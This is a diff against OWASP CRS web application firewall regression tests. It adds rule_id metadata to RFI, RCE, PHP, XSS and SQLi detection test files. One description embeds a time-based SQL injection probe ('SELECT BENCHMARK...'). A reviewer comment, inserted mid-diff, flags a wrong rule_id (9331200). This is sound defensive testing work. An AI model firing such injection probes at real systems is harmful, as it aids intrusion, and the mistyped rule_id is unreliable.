--- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931100.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 931100 tests: - test_id: 1 desc: Remote File Inclusion Attack (931100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml index b03ef1598..146646540 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931110.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, azurit" +rule_id: 931110 tests: - test_id: 1 desc: Remote File Inclusion Attack (931110) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml index 0ae323632..3bf7fb547 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml @@ -1,6 +1,7 @@ --- meta: author: "studersi, azurit" +rule_id: 931120 tests: - test_id: 1 desc: Remote File Inclusion Attack (931120) diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index d9f5c7581..d67a67c03 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml @@ -1,6 +1,7 @@ --- meta: author: "studersi, azurit" +rule_id: 931130 tests: - test_id: 1 desc: Remote File Inclusion Attack (931130) diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml index 5d1e1291c..76c23d6eb 100644 
--- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml @@ -1,6 +1,7 @@ --- meta: author: "emphazer, azurit" +rule_id: 931131 tests: - test_id: 1 desc: Remote File Inclusion Attack (931131) with REQUEST_FILENAME diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml index 1eff8d79d..112069387 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932161.yaml @@ -1,6 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" +rule_id: 932161 tests: - test_id: 1 stages: diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml index 47814322e..f3b239825 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml @@ -4,6 +4,7 @@ meta: description: | Old tests and tests for fix of 932230 rule triggered with html decimal entities because of using legacy ISO-8859 charsets family - https://github.com/coreruleset/coreruleset/issues/1886. If you need to trigger tests on a command, use one of the three letter commands in the file included by the 932230 data rule. +rule_id: 932230 tests: - test_id: 1 desc: System Command Injection (932230) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml index 3676f2a3a..3591d48ee 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932237.yaml 
@@ -1,6 +1,7 @@ --- meta: author: "Franziska Bühler, Esad Cetiner, azurit" +rule_id: 932237 tests: - test_id: 1 stages: diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml index 1bf4cbecd..5ab8ae6f4 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932238.yaml @@ -1,6 +1,7 @@ --- meta: author: "Max Leske, Xhoenix, azurit" +rule_id: 932238 tests: - test_id: 1 desc: "9323HNQU" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml index 70d0cd95e..8cbb89e80 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml @@ -5,6 +5,7 @@ meta: Tests to trigger or not trigger rule 932250. - commands used must be less than 4 chars - [\s<>&|)] is required after a command to reduce FPs +rule_id: 932250 tests: - test_id: 1 desc: Negative test for excluded command `tar` diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml index c6824245c..cf96b5e1f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933100.yaml @@ -1,6 +1,7 @@ --- meta: author: "csanders-git, Franziska Bühler, azurit" +rule_id: 933100 tests: - test_id: 1 desc: PHP Injection Attack (933100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml index 00adca968..9901ec55e 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml 
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933111.yaml @@ -1,6 +1,7 @@ --- meta: author: "NiceYouKnow, azurit" +rule_id: 933111 tests: - test_id: 1 desc: "PHP Injection Attack: PHP Script File Upload Found" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml index 48d23b566..47955fc8a 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933120.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 933120 tests: - test_id: 1 desc: "PHP Injection Attack: Configuration Directive" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml index 9b73d9bb9..7d50b91e3 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933140.yaml @@ -1,6 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" +rule_id: 933140 tests: - test_id: 1 desc: "PHP Injection Attack: I/O Stream" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml index 9f5fa44d8..c05319b5f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml @@ -1,6 +1,7 @@ --- meta: author: "lifeforms, azurit" +rule_id: 933150 tests: - test_id: 1 desc: phpinfo diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml index ad9c14489..06ebd3a85 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933151.yaml 
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "lifeforms, ssigwart, azurit"
+rule_id: 933151
 tests:
 - test_id: 1
 desc: "pmf + chain"
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
index 86ef8941b..8c561628e 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "lifeforms, Franziska Bühler, Max Leske, azurit"
+rule_id: 933160
 tests:
 - test_id: 1
 desc: |
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
index e277b6468..fe5ac6247 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "lifeforms, azurit"
+rule_id: 933161
 tests:
 - test_id: 1
 desc: regexp; must run test in PL3!
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml
index 0464e98c4..0587a2cd0 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "lifeforms, azurit"
+rule_id: 933170
 tests:
 - test_id: 1
 desc: PHP object injection
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml
index 0c2a9e839..ba6621baf 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "NiceYouKnow, azurit"
+rule_id: 933190
 tests:
 - test_id: 1
 desc: "PHP Injection Attack: PHP Closing Tag Found"
diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml
index de7a6248d..83a1a3e77 100644
--- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml
+++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "NiceYouKnow, azurit"
+rule_id: 9331200
 tests:
 - test_id: 1
 desc: "Positive test: PHP Injection Attack - Wrapper scheme detected (phar://)"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
index 1ca8f74c9..46415eef9 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, Walter Hop, azurit"
+rule_id: 941120
 tests:
 - test_id: 1
 desc: "XSS Filter - Category 2: Event Handler Vector"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml
index 724283088..b6725448e 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941230
 tests:
 - test_id: 1
 desc: "IE XSS Filters"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml
index 3778f0162..6bd84e2c9 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml
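Review bot: The added line `+rule_id: 9331200` in 933200.yaml carries an extra digit; the file name and the first test's description both refer to rule 933200, so the line should read `rule_id: 933200`. If the test harness keys tests by this field, the typo would silently detach the whole file from the rule it exercises, or fail validation, depending on the consumer. Since every hunk in this commit duplicates a value already encoded in the file name, a lint step that asserts `rule_id` equals the numeric stem of the file name would catch this class of error across all of them.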
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941240
 tests:
 - test_id: 1
 desc: "IE XSS Filters"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml
index 9dbc15bcb..6033163b5 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941250
 tests:
 - test_id: 1
 desc: "IE XSS Filters"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml
index 176876cdf..1cc0cb1dd 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941260
 tests:
 - test_id: 1
 desc: "IE XSS Filters"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml
index bd09168ad..dec041596 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941270
 tests:
 - test_id: 1
 desc: "IE XSS Filters"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml
index b1239a7a0..8d2fa94a2 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941280
 tests:
 - test_id: 1
 desc: "IE XSS Filters"
@@ -25,7 +26,7 @@ tests:
 dest_addr: 127.0.0.1
 headers:
 Host: localhost
- Content-Length: 113
+ Content-Length: "113"
 User-Agent: "OWASP CRS test agent"
 Content-Type: application/x-www-form-urlencoded
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml
index d1b0a149e..c10eff63a 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941290
 tests:
 - test_id: 1
 desc: "IE XSS Filters"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml
index 679fa5e6e..14f42f240 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941300
 tests:
 - test_id: 1
 desc: "IE XSS Filters"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
index f725188c4..65c280f54 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941320
 tests:
 - test_id: 1
 desc: "XSS Attack - HTML Tag Handler"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml
index a5509fd74..3b360ff29 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941330
 tests:
 - test_id: 1
 desc: "IE XSS Filters - Attack"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
index 61dcf4817..b75576c73 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 941340
 tests:
 - test_id: 1
 desc: "IE XSS Filters - Attack"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
index ad7f1ed67..b94241cfa 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian Folini, azurit"
+rule_id: 941360
 tests:
 - test_id: 1
 desc: "JSFuck / Hieroglyphy payload obfuscation attack"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml
index 91fb0cd18..ca9246a0a 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Andrea Menin, azurit"
+rule_id: 941370
 tests:
 - test_id: 1
 desc: "Bypass using comment in syntax and multiple whitespaces"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml
index be8d0234b..5b4a9f5f3 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Franziska Buehler, azurit"
+rule_id: 941380
 tests:
 - test_id: 1
 desc: "AngularJS client side template injection detection"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
index 61cd7bd18..0de1e929e 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Franziska Buehler, Xhoenix, azurit"
+rule_id: 941390
 tests:
 - test_id: 1
 desc: "JavaScript method setInterval(code, 1)"
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml
index ee9939f62..12cc969e8 100644
--- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Andrea Menin, azurit"
+rule_id: 941400
 tests:
 - test_id: 1
 desc: "JavaScript function without parentheses"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
index 8d126d024..39094ed08 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
@@ -1,8 +1,8 @@
 ---
 meta:
 author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit"
+rule_id: 942120
 tests:
- - test_id: 1
 - test_id: 1
 desc: "SQL Injection Attack: SQL Operator Detected"
 stages:
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
index 9c237d09a..c4d4e9983 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron and Allan Boll, Franziska Bühler, azurit"
+rule_id: 942130
 tests:
 - test_id: 1
 desc: "SQL Injection Attack: SQL Tautology"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
index ffb58f6d1..421fedd10 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, Christoph Hansen, azurit"
+rule_id: 942140
 tests:
 - test_id: 1
 desc: "SQL Injection Attack: Common DB Names Detected"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
index 3b3cfe354..511fd3e00 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit"
+rule_id: 942160
 tests:
 - test_id: 1
 desc: "SQL Injection Attack: Common DB Names Detected"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
index 6144f707b..44ce44bdd 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Franziska Bühler, azurit"
+rule_id: 942170
 tests:
 - test_id: 1
 desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
index 769080342..8b96a08c5 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 942180
 tests:
 - test_id: 1
 desc: "basic SQL authentication bypass"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml
index 41ae47c46..fed1116d6 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942190.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit"
+rule_id: 942190
 tests:
 - test_id: 1
 desc: "MSSQL code execution and information gathering attempts"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml
index e8daad8cb..0415f2901 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942200.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, Franziska Bühler, azurit"
+rule_id: 942200
 tests:
 - test_id: 1
 desc: "comment-/space-obfuscated injections and backtick termination"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml
index c9fdd4047..969cb4116 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942220.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, azurit"
+rule_id: 942220
 tests:
 - test_id: 1
 desc: "Integer overflow taken from skipfish"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml
index f77654ff0..30d7bf3ad 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942230.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christian S.J. Peron, Franziska Bühler, azurit"
+rule_id: 942230
 tests:
 - test_id: 1
 desc: "conditional SQL injection attempts"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml
index 19fcf99aa..5e6aba9b7 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942240.yaml
@@ -1,6 +1,7 @@
 ---
 meta:
 author: "Christoph Hansen, azurit"
+rule_id: 942240
 tests:
 - test_id: 1
 desc: "Detects MySQL charset switch and MSSQL DoS attempts"